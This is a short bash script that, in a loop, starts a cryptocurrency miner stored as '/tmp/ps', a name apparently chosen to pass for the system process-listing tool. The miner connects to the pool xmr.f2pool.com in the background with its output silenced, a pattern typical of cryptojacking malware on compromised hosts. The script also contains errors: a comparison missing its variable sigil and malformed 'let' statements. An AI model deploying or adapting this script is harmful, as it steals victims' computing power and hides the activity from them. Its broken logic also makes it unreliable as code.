#!/bin/bash 
COUNTER=0
while [  $COUNTER -lt 100 ]; do
	echo The counter is $COUNTER
	if [ COUNTER == 100 ]; then
		sleep 1200s
	    pkill -f ps
	    let COUNTER = 0
	else
		/tmp/ps --pool xmr.f2pool.com:13531 --username $user.$top --password x --algorithm wrkzcoin >/dev/null &
	    sleep 20s
	    let COUNTER = COUNTER+1
	fi
done
